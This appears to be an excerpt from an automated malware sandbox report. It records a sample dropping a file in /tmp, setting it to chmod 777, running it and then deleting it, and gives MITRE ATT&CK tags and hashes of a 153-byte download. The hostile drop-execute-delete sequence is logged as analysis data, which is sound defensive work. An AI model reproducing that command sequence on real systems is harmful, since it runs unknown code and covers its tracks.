/bin/chmodchmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:1004
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97